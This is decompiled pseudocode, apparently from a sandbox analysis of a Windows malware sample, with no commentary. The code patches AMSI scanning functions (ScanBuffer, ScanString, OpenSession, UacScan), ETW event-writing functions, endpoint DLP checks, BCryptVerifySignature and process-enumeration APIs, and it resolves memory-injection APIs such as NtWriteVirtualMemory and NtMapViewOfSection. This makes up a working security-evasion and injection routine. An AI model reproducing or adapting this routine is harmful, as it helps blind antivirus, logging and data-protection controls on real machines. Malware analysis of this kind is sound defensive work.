                                                                                                  						_t4972 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2264, _t4972, 0x2874c4c);
                                                                                                  						E02854698( &_v2260, E02854964(_v2264));
                                                                                                  						_pop(_t5511); // executed
                                                                                                  						E02867B80(_v2260, _t5511); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2268, E02854964(_v2272));
                                                                                                  						_push(_v2268);
                                                                                                  						_t4973 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2280, _t4973, 0x2874c4c);
                                                                                                  						E02854698( &_v2276, E02854964(_v2280));
                                                                                                  						_pop(_t5516); // executed
                                                                                                  						E02867B80(_v2276, _t5516); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2284, E02854964(_v2288));
                                                                                                  						_push(_v2284);
                                                                                                  						_t4974 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2296, _t4974, 0x2874c4c);
                                                                                                  						E02854698( &_v2292, E02854964(_v2296));
                                                                                                  						_pop(_t5521); // executed
                                                                                                  						E02867B80(_v2292, _t5521);
                                                                                                  						_t2846 =  *0x28a6624; // 0x29f1bb8
                                                                                                  						E028548B0(_t2846, 0x2874db0);
                                                                                                  						if(__eflags != 0) {
                                                                                                  							L32:
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v3348, E02854964(_v3352));
                                                                                                  							_push(_v3348);
                                                                                                  							_t4975 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v3360, _t4975, 0x2874c4c);
                                                                                                  							E02854698( &_v3356, E02854964(_v3360));
                                                                                                  							_pop(_t5527); // executed
                                                                                                  							E02867B80(_v3356, _t5527); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v3364, E02854964(_v3368));
                                                                                                  							_push(_v3364);
                                                                                                  							_t4976 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v3376, _t4976, 0x2874c4c);
                                                                                                  							E02854698( &_v3372, E02854964(_v3376));
                                                                                                  							_pop(_t5532); // executed
                                                                                                  							E02867B80(_v3372, _t5532); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v3380, E02854964(_v3384));
                                                                                                  							_push(_v3380);
                                                                                                  							_t4977 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v3392, _t4977, 0x2874c4c);
                                                                                                  							E02854698( &_v3388, E02854964(_v3392));
                                                                                                  							_pop(_t5537); // executed
                                                                                                  							E02867B80(_v3388, _t5537);
                                                                                                  							_t2890 =  *0x28a6614; // 0x29f1be8
                                                                                                  							E028548B0(_t2890, 0x2874db0);
                                                                                                  							if(__eflags != 0) {
                                                                                                  								L37:
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanString");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3676, E02854964(_v3680));
                                                                                                  								_push(_v3676);
                                                                                                  								_t4978 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3688, _t4978, 0x2874c4c);
                                                                                                  								E02854698( &_v3684, E02854964(_v3688));
                                                                                                  								_pop(_t5543); // executed
                                                                                                  								E02867B80(_v3684, _t5543); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("Initialize");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3692, E02854964(_v3696));
                                                                                                  								_push(_v3692);
                                                                                                  								_t4979 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3704, _t4979, 0x2874c4c);
                                                                                                  								E02854698( &_v3700, E02854964(_v3704));
                                                                                                  								_pop(_t5548); // executed
                                                                                                  								E02867B80(_v3700, _t5548); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanBuffer");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3708, E02854964(_v3712));
                                                                                                  								_push(_v3708);
                                                                                                  								_t4980 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3720, _t4980, 0x2874c4c);
                                                                                                  								E02854698( &_v3716, E02854964(_v3720));
                                                                                                  								_pop(_t5553); // executed
                                                                                                  								E02867B80(_v3716, _t5553);
                                                                                                  								_t2934 =  *0x28a6610; // 0x29f1bd8
                                                                                                  								E028548B0(_t2934, 0x2874db0);
                                                                                                  								if(__eflags == 0) {
                                                                                                  									_t3348 =  *0x28a6614; // 0x29f1be8
                                                                                                  									E028548B0(_t3348, 0x2874d2c);
                                                                                                  									if(__eflags == 0) {
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("UacScan");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3724, E02854964(_v3728));
                                                                                                  										_push(_v3724);
                                                                                                  										_t4993 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3736, _t4993, 0x2874c4c);
                                                                                                  										E02854698( &_v3732, E02854964(_v3736));
                                                                                                  										_pop(_t5728); // executed
                                                                                                  										E02867B80(_v3732, _t5728); // executed
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("OpenSession");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3740, E02854964(_v3744));
                                                                                                  										_push(_v3740);
                                                                                                  										_t4994 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3752, _t4994, 0x2874c4c);
                                                                                                  										E02854698( &_v3748, E02854964(_v3752));
                                                                                                  										_pop(_t5733); // executed
                                                                                                  										E02867B80(_v3748, _t5733); // executed
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("ScanString");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3756, E02854964(_v3760));
                                                                                                  										_push(_v3756);
                                                                                                  										_t4995 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3768, _t4995, 0x2874c4c);
                                                                                                  										E02854698( &_v3764, E02854964(_v3768));
                                                                                                  										_pop(_t5738); // executed
                                                                                                  										E02867B80(_v3764, _t5738); // executed
                                                                                                  										_push( *0x28a65d0);
                                                                                                  										_push(0x2874de8);
                                                                                                  										_t3392 =  *0x28a6620; // 0x29f97a8
                                                                                                  										E02867C68(_t3392, _t4995,  &_v3776);
                                                                                                  										_push(_v3776);
                                                                                                  										_push(0x2875048);
                                                                                                  										_push(0);
                                                                                                  										_push(0x2875054);
                                                                                                  										_push(0);
                                                                                                  										_push(0x2875060);
                                                                                                  										E02854824();
                                                                                                  										E02854698(0x28a6608, E02854964(_v3772));
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("ScanString");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3780, E02854964(_v3784));
                                                                                                  										_push(_v3780);
                                                                                                  										_t4996 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3792, _t4996, 0x2874c4c);
                                                                                                  										E02854698( &_v3788, E02854964(_v3792));
                                                                                                  										_pop(_t5746); // executed
                                                                                                  										E02867B80(_v3788, _t5746); // executed
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("OpenSession");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3796, E02854964(_v3800));
                                                                                                  										_push(_v3796);
                                                                                                  										_t4997 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3808, _t4997, 0x2874c4c);
                                                                                                  										E02854698( &_v3804, E02854964(_v3808));
                                                                                                  										_pop(_t5751); // executed
                                                                                                  										E02867B80(_v3804, _t5751);
                                                                                                  										_t3427 =  *0x28a6608; // 0x29e3608
                                                                                                  										_t3428 = E02857E40(_t3427);
                                                                                                  										__eflags = _t3428;
                                                                                                  										if(_t3428 == 0) {
                                                                                                  											_push(0x2874c4c);
                                                                                                  											_push( *0x28a65fc);
                                                                                                  											_push("ScanBuffer");
                                                                                                  											E02854824();
                                                                                                  											E02854698( &_v3812, E02854964(_v3816));
                                                                                                  											_push(_v3812);
                                                                                                  											_t5001 =  *0x28a65fc; // 0x29f1b38
                                                                                                  											E028547B0( &_v3824, _t5001, 0x2874c4c);
                                                                                                  											E02854698( &_v3820, E02854964(_v3824));
                                                                                                  											_pop(_t5773); // executed
                                                                                                  											E02867B80(_v3820, _t5773); // executed
                                                                                                  											_push(0x2874c4c);
                                                                                                  											_push( *0x28a65fc);
                                                                                                  											_push("UacScan");
                                                                                                  											E02854824();
                                                                                                  											E02854698( &_v3828, E02854964(_v3832));
                                                                                                  											_push(_v3828);
                                                                                                  											_t5002 =  *0x28a65fc; // 0x29f1b38
                                                                                                  											E028547B0( &_v3840, _t5002, 0x2874c4c);
                                                                                                  											E02854698( &_v3836, E02854964(_v3840));
                                                                                                  											_pop(_t5778); // executed
                                                                                                  											E02867B80(_v3836, _t5778); // executed
                                                                                                  											E0286C03C(0x2877d24,  &_v3844, 0x2aeb7);
                                                                                                  											E028544F4(0x28a659c, _v3844);
                                                                                                  											_push(0x2874c4c);
                                                                                                  											_push( *0x28a65fc);
                                                                                                  											_push("UacScan");
                                                                                                  											E02854824();
                                                                                                  											E02854698( &_v3848, E02854964(_v3852));
                                                                                                  											_push(_v3848);
                                                                                                  											_t5004 =  *0x28a65fc; // 0x29f1b38
                                                                                                  											E028547B0( &_v3860, _t5004, 0x2874c4c);
                                                                                                  											E02854698( &_v3856, E02854964(_v3860));
                                                                                                  											_pop(_t5785); // executed
                                                                                                  											E02867B80(_v3856, _t5785); // executed
                                                                                                  											_push(0x2874c4c);
                                                                                                  											_push( *0x28a65fc);
                                                                                                  											_push("ScanString");
                                                                                                  											E02854824();
                                                                                                  											E02854698( &_v3864, E02854964(_v3868));
                                                                                                  											_push(_v3864);
                                                                                                  											_t5005 =  *0x28a65fc; // 0x29f1b38
                                                                                                  											E028547B0( &_v3876, _t5005, 0x2874c4c);
                                                                                                  											E02854698( &_v3872, E02854964(_v3876));
                                                                                                  											_pop(_t5790); // executed
                                                                                                  											E02867B80(_v3872, _t5790); // executed
                                                                                                  											_t5791 =  *0x28a6608; // 0x29e3608
                                                                                                  											E02854DA4( &_v3880, _t5791);
                                                                                                  											_push(_v3880);
                                                                                                  											_t5792 =  *0x28a659c; // 0x28c40a8
                                                                                                  											E02854DA4( &_v3888, _t5792);
                                                                                                  											E02854728( &_v3884, _v3888);
                                                                                                  											_pop(_t5794); // executed
                                                                                                  											E0286BCF4(_v3884, _t4897, _t5794, _t6275); // executed
                                                                                                  										}
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("Initialize");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3892, E02854964(_v3896));
                                                                                                  										_push(_v3892);
                                                                                                  										_t4998 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3904, _t4998, 0x2874c4c);
                                                                                                  										E02854698( &_v3900, E02854964(_v3904));
                                                                                                  										_pop(_t5756); // executed
                                                                                                  										E02867B80(_v3900, _t5756); // executed
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("ScanBuffer");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3908, E02854964(_v3912));
                                                                                                  										_push(_v3908);
                                                                                                  										_t4999 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3920, _t4999, 0x2874c4c);
                                                                                                  										E02854698( &_v3916, E02854964(_v3920));
                                                                                                  										_pop(_t5761); // executed
                                                                                                  										E02867B80(_v3916, _t5761); // executed
                                                                                                  										_push(0x2874c4c);
                                                                                                  										_push( *0x28a65fc);
                                                                                                  										_push("OpenSession");
                                                                                                  										E02854824();
                                                                                                  										E02854698( &_v3924, E02854964(_v3928));
                                                                                                  										_push(_v3924);
                                                                                                  										_t5000 =  *0x28a65fc; // 0x29f1b38
                                                                                                  										E028547B0( &_v3936, _t5000, 0x2874c4c);
                                                                                                  										E02854698( &_v3932, E02854964(_v3936));
                                                                                                  										_pop(_t5766); // executed
                                                                                                  										E02867B80(_v3932, _t5766); // executed
                                                                                                  										_push(E028549BC(0x28a65c4));
                                                                                                  										_t3473 =  *0x28a6608; // 0x29e3608
                                                                                                  										E02854698( &_v3940, E02854964(_t3473));
                                                                                                  										_pop(_t5768); // executed
                                                                                                  										E02869D28(_v3940, _t4897, _t5768, _t6274, _t6275, _t6295); // executed
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("Initialize");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3944, E02854964(_v3948));
                                                                                                  								_push(_v3944);
                                                                                                  								_t4981 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3956, _t4981, 0x2874c4c);
                                                                                                  								E02854698( &_v3952, E02854964(_v3956));
                                                                                                  								_pop(_t5559); // executed
                                                                                                  								E02867B80(_v3952, _t5559); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanString");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3960, E02854964(_v3964));
                                                                                                  								_push(_v3960);
                                                                                                  								_t4982 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3972, _t4982, 0x2874c4c);
                                                                                                  								E02854698( &_v3968, E02854964(_v3972));
                                                                                                  								_pop(_t5564); // executed
                                                                                                  								E02867B80(_v3968, _t5564); // executed
                                                                                                  								E02854698( &_v3976, "BCryptVerifySignature");
                                                                                                  								_push(_v3976);
                                                                                                  								E02854698( &_v3980, "bcrypt");
                                                                                                  								_pop(_t5567); // executed
                                                                                                  								E02867B80(_v3980, _t5567); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("OpenSession");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v3984, E02854964(_v3988));
                                                                                                  								_push(_v3984);
                                                                                                  								_t4983 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v3996, _t4983, 0x2874c4c);
                                                                                                  								E02854698( &_v3992, E02854964(_v3996));
                                                                                                  								_pop(_t5572); // executed
                                                                                                  								E02867B80(_v3992, _t5572); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("Initialize");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4000, E02854964(_v4004));
                                                                                                  								_push(_v4000);
                                                                                                  								_t4984 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4012, _t4984, 0x2874c4c);
                                                                                                  								E02854698( &_v4008, E02854964(_v4012));
                                                                                                  								_pop(_t5577); // executed
                                                                                                  								E02867B80(_v4008, _t5577); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanBuffer");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4016, E02854964(_v4020));
                                                                                                  								_push(_v4016);
                                                                                                  								_t4985 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4028, _t4985, 0x2874c4c);
                                                                                                  								E02854698( &_v4024, E02854964(_v4028));
                                                                                                  								_pop(_t5582); // executed
                                                                                                  								E02867B80(_v4024, _t5582); // executed
                                                                                                  								E02854698( &_v4032, "DlpNotifyPreDragDrop");
                                                                                                  								_push(_v4032);
                                                                                                  								E02854698( &_v4036, "endpointdlp");
                                                                                                  								_pop(_t5585); // executed
                                                                                                  								E02867B80(_v4036, _t5585); // executed
                                                                                                  								E02854698( &_v4040, "DlpCheckIsCloudSyncApp");
                                                                                                  								_push(_v4040);
                                                                                                  								E02854698( &_v4044, "endpointdlp");
                                                                                                  								_pop(_t5588); // executed
                                                                                                  								E02867B80(_v4044, _t5588); // executed
                                                                                                  								E02854698( &_v4048, "DlpGetArchiveFileTraceInfo");
                                                                                                  								_push(_v4048);
                                                                                                  								E02854698( &_v4052, "endpointdlp");
                                                                                                  								_pop(_t5591); // executed
                                                                                                  								E02867B80(_v4052, _t5591); // executed
                                                                                                  								E02854698( &_v4056, "DlpGetWebSiteAccess");
                                                                                                  								_push(_v4056);
                                                                                                  								E02854698( &_v4060, "endpointdlp");
                                                                                                  								_pop(_t5594); // executed
                                                                                                  								E02867B80(_v4060, _t5594); // executed
                                                                                                  								E02854698( &_v4064, "NtAlertResumeThread");
                                                                                                  								_push(_v4064);
                                                                                                  								E02854698( &_v4068, "ntdll");
                                                                                                  								_pop(_t5597);
                                                                                                  								E02867B80(_v4068, _t5597);
                                                                                                  								E02854698( &_v4072, "RtlAllocateHeap");
                                                                                                  								_push(_v4072);
                                                                                                  								E02854698( &_v4076, "ntdll");
                                                                                                  								_pop(_t5600);
                                                                                                  								E02867B80(_v4076, _t5600);
                                                                                                  								E02854698( &_v4080, "NtWaitForSingleObject");
                                                                                                  								_push(_v4080);
                                                                                                  								E02854698( &_v4084, "ntdll");
                                                                                                  								_pop(_t5603);
                                                                                                  								E02867B80(_v4084, _t5603);
                                                                                                  								E02854698( &_v4088, "RtlAllocateHeap");
                                                                                                  								_push(_v4088);
                                                                                                  								E02854698( &_v4092, "ntdll");
                                                                                                  								_pop(_t5606);
                                                                                                  								E02867B80(_v4092, _t5606);
                                                                                                  								E02854698( &_v4096, "RtlCreateQueryDebugBuffer");
                                                                                                  								_push(_v4096);
                                                                                                  								E02854698( &_v4100, "ntdll");
                                                                                                  								_pop(_t5609);
                                                                                                  								E02867B80(_v4100, _t5609);
                                                                                                  								E02867B80(0x287517c, "NtQuerySystemInformation");
                                                                                                  								E02867B80(0x287517c, "NtDeviceIoControlFile");
                                                                                                  								E02867B80(0x287517c, "NtQueryDirectoryFile");
                                                                                                  								E02867B80(0x287517c, "RtlQueryProcessDebugInformation");
                                                                                                  								E02867B80("Advapi", "EnumServicesStatusA"); // executed
                                                                                                  								E02867B80("Advapi", "EnumServicesStatusW"); // executed
                                                                                                  								E02867B80("Advapi", "EnumServicesStatusExA"); // executed
                                                                                                  								E02867B80("Advapi", "EnumServicesStatusExW"); // executed
                                                                                                  								E02867B80(0x2875298, "EnumProcessModules"); // executed
                                                                                                  								E02867B80("Kernel32", "CreateProcessA");
                                                                                                  								E02867B80("Kernel32", "CreateProcessW");
                                                                                                  								E02867B80("Advapi", "CreateProcessAsUserA"); // executed
                                                                                                  								E02867B80("Advapi", "CreateProcessAsUserW"); // executed
                                                                                                  								E02867B80("Advapi", "CreateProcessWithLogonW"); // executed
                                                                                                  								E02867B80("ws2_32", "connect");
                                                                                                  								E02867B80("Kernel32", "CreateProcessAsUserW");
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("UacInitialize");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4104, E02854964(_v4108));
                                                                                                  								_push(_v4104);
                                                                                                  								_t4986 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4116, _t4986, 0x2874c4c);
                                                                                                  								E02854698( &_v4112, E02854964(_v4116));
                                                                                                  								_pop(_t5630); // executed
                                                                                                  								E02867B80(_v4112, _t5630); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("OpenSession");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4120, E02854964(_v4124));
                                                                                                  								_push(_v4120);
                                                                                                  								_t4987 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4132, _t4987, 0x2874c4c);
                                                                                                  								E02854698( &_v4128, E02854964(_v4132));
                                                                                                  								_pop(_t5635); // executed
                                                                                                  								E02867B80(_v4128, _t5635); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanString");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4136, E02854964(_v4140));
                                                                                                  								_push(_v4136);
                                                                                                  								_t4988 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4148, _t4988, 0x2874c4c);
                                                                                                  								E02854698( &_v4144, E02854964(_v4148));
                                                                                                  								_pop(_t5640); // executed
                                                                                                  								E02867B80(_v4144, _t5640); // executed
                                                                                                  								E02854698( &_v4152, "VirtualAlloc");
                                                                                                  								_push(_v4152);
                                                                                                  								E02854698( &_v4156, "kernel32");
                                                                                                  								_pop(_t5643);
                                                                                                  								E02867B80(_v4156, _t5643);
                                                                                                  								E02854698( &_v4160, "VirtualAllocEx");
                                                                                                  								_push(_v4160);
                                                                                                  								E02854698( &_v4164, "kernel32");
                                                                                                  								_pop(_t5646);
                                                                                                  								E02867B80(_v4164, _t5646);
                                                                                                  								E02854698( &_v4168, "VirtualProtect");
                                                                                                  								_push(_v4168);
                                                                                                  								E02854698( &_v4172, "kernel32");
                                                                                                  								_pop(_t5649);
                                                                                                  								E02867B80(_v4172, _t5649);
                                                                                                  								E02854698( &_v4176, "OpenProcess");
                                                                                                  								_push(_v4176);
                                                                                                  								E02854698( &_v4180, "kernel32");
                                                                                                  								_pop(_t5652);
                                                                                                  								E02867B80(_v4180, _t5652);
                                                                                                  								E02854698( &_v4184, "WriteVirtualMemory");
                                                                                                  								_push(_v4184);
                                                                                                  								E02854698( &_v4188, "kernel32");
                                                                                                  								_pop(_t5655);
                                                                                                  								E02867B80(_v4188, _t5655);
                                                                                                  								E02854698( &_v4192, "FlushInstructionCache");
                                                                                                  								_push(_v4192);
                                                                                                  								E02854698( &_v4196, "kernel32");
                                                                                                  								_pop(_t5658);
                                                                                                  								E02867B80(_v4196, _t5658);
                                                                                                  								E02854698( &_v4200, "SetUnhandledExceptionFilter");
                                                                                                  								_push(_v4200);
                                                                                                  								E02854698( &_v4204, "kernel32");
                                                                                                  								_pop(_t5661);
                                                                                                  								E02867B80(_v4204, _t5661);
                                                                                                  								E02854698( &_v4208, "NtGetWriteWatch");
                                                                                                  								_push(_v4208);
                                                                                                  								E02854698( &_v4212, "ntdll");
                                                                                                  								_pop(_t5664);
                                                                                                  								E02867B80(_v4212, _t5664);
                                                                                                  								E02854698( &_v4216, "NtQueryVirtualMemory");
                                                                                                  								_push(_v4216);
                                                                                                  								E02854698( &_v4220, "ntdll");
                                                                                                  								_pop(_t5667);
                                                                                                  								E02867B80(_v4220, _t5667);
                                                                                                  								E02854698( &_v4224, "NtQueryInformationThread");
                                                                                                  								_push(_v4224);
                                                                                                  								E02854698( &_v4228, "ntdll");
                                                                                                  								_pop(_t5670);
                                                                                                  								E02867B80(_v4228, _t5670);
                                                                                                  								E02854698( &_v4232, "NtOpenSection");
                                                                                                  								_push(_v4232);
                                                                                                  								E02854698( &_v4236, "ntdll");
                                                                                                  								_pop(_t5673);
                                                                                                  								E02867B80(_v4236, _t5673);
                                                                                                  								E02854698( &_v4240, "NtCreateSection");
                                                                                                  								_push(_v4240);
                                                                                                  								E02854698( &_v4244, "ntdll");
                                                                                                  								_pop(_t5676);
                                                                                                  								E02867B80(_v4244, _t5676);
                                                                                                  								E02854698( &_v4248, "NtMapViewOfSection");
                                                                                                  								_push(_v4248);
                                                                                                  								E02854698( &_v4252, "ntdll");
                                                                                                  								_pop(_t5679);
                                                                                                  								E02867B80(_v4252, _t5679);
                                                                                                  								E02854698( &_v4256, "NtReadVirtualMemory");
                                                                                                  								_push(_v4256);
                                                                                                  								E02854698( &_v4260, "ntdll");
                                                                                                  								_pop(_t5682);
                                                                                                  								E02867B80(_v4260, _t5682);
                                                                                                  								E02854698( &_v4264, "NtQuerySecurityObject");
                                                                                                  								_push(_v4264);
                                                                                                  								E02854698( &_v4268, "ntdll");
                                                                                                  								_pop(_t5685);
                                                                                                  								E02867B80(_v4268, _t5685);
                                                                                                  								E02854698( &_v4272, "NtAccessCheck");
                                                                                                  								_push(_v4272);
                                                                                                  								E02854698( &_v4276, "ntdll");
                                                                                                  								_pop(_t5688);
                                                                                                  								E02867B80(_v4276, _t5688);
                                                                                                  								E02854698( &_v4280, "LdrLoadDll");
                                                                                                  								_push(_v4280);
                                                                                                  								E02854698( &_v4284, "ntdll");
                                                                                                  								_pop(_t5691);
                                                                                                  								E02867B80(_v4284, _t5691);
                                                                                                  								E02854698( &_v4288, "LdrGetProcedureAddress");
                                                                                                  								_push(_v4288);
                                                                                                  								E02854698( &_v4292, "ntdll");
                                                                                                  								_pop(_t5694);
                                                                                                  								E02867B80(_v4292, _t5694);
                                                                                                  								E02854698( &_v4296, "NtWriteVirtualMemory");
                                                                                                  								_push(_v4296);
                                                                                                  								E02854698( &_v4300, "ntdll");
                                                                                                  								_pop(_t5697);
                                                                                                  								E02867B80(_v4300, _t5697);
                                                                                                  								E02854698( &_v4304, "NtOpenFile");
                                                                                                  								_push(_v4304);
                                                                                                  								E02854698( &_v4308, "ntdll");
                                                                                                  								_pop(_t5700);
                                                                                                  								E02867B80(_v4308, _t5700);
                                                                                                  								E02854698( &_v4312, "EtwEventWriteEx");
                                                                                                  								_push(_v4312);
                                                                                                  								E02854698( &_v4316, "ntdll");
                                                                                                  								_pop(_t5703);
                                                                                                  								E02867B80(_v4316, _t5703);
                                                                                                  								E02854698( &_v4320, "EtwEventWrite");
                                                                                                  								_push(_v4320);
                                                                                                  								E02854698( &_v4324, "ntdll");
                                                                                                  								_pop(_t5706);
                                                                                                  								E02867B80(_v4324, _t5706);
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("Initialize");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4328, E02854964(_v4332));
                                                                                                  								_push(_v4328);
                                                                                                  								_t4989 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4340, _t4989, 0x2874c4c);
                                                                                                  								E02854698( &_v4336, E02854964(_v4340));
                                                                                                  								_pop(_t5711); // executed
                                                                                                  								E02867B80(_v4336, _t5711); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanBuffer");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4344, E02854964(_v4348));
                                                                                                  								_push(_v4344);
                                                                                                  								_t4990 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4356, _t4990, 0x2874c4c);
                                                                                                  								E02854698( &_v4352, E02854964(_v4356));
                                                                                                  								_pop(_t5716); // executed
                                                                                                  								E02867B80(_v4352, _t5716); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("OpenSession");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v4360, E02854964(_v4364));
                                                                                                  								_push(_v4360);
                                                                                                  								_t4991 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v4372, _t4991, 0x2874c4c);
                                                                                                  								E02854698( &_v4368, E02854964(_v4372));
                                                                                                  								_pop(_t5721); // executed
                                                                                                  								E02867B80(_v4368, _t5721); // executed
                                                                                                  								E02867B24(GetCurrentProcess(), "NtOpenProcess");
                                                                                                  								ExitProcess(0); // executed
                                                                                                  								goto L43;
                                                                                                  							} else {
                                                                                                  								_t3548 =  *0x28a6610; // 0x29f1bd8
                                                                                                  								E028548B0(_t3548, 0x2874d2c);
                                                                                                  								if(__eflags != 0) {
                                                                                                  									goto L37;
                                                                                                  								} else {
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3396, E02854964(_v3400));
                                                                                                  									_push(_v3396);
                                                                                                  									_t5006 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3408, _t5006, 0x2874c4c);
                                                                                                  									E02854698( &_v3404, E02854964(_v3408));
                                                                                                  									_pop(_t5800);
                                                                                                  									E02867B80(_v3404, _t5800);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("ScanString");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3412, E02854964(_v3416));
                                                                                                  									_push(_v3412);
                                                                                                  									_t5007 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3424, _t5007, 0x2874c4c);
                                                                                                  									E02854698( &_v3420, E02854964(_v3424));
                                                                                                  									_pop(_t5805);
                                                                                                  									E02867B80(_v3420, _t5805);
                                                                                                  									_push(0x2874c4c);
                                                                                                  									_push( *0x28a65fc);
                                                                                                  									_push("OpenSession");
                                                                                                  									E02854824();
                                                                                                  									E02854698( &_v3428, E02854964(_v3432));
                                                                                                  									_push(_v3428);
                                                                                                  									_t5008 =  *0x28a65fc; // 0x29f1b38
                                                                                                  									E028547B0( &_v3440, _t5008, 0x2874c4c);
                                                                                                  									E02854698( &_v3436, E02854964(_v3440));
                                                                                                  									_pop(_t5810);
                                                                                                  									E02867B80(_v3436, _t5810);
                                                                                                  									_push(0x2874c4c);
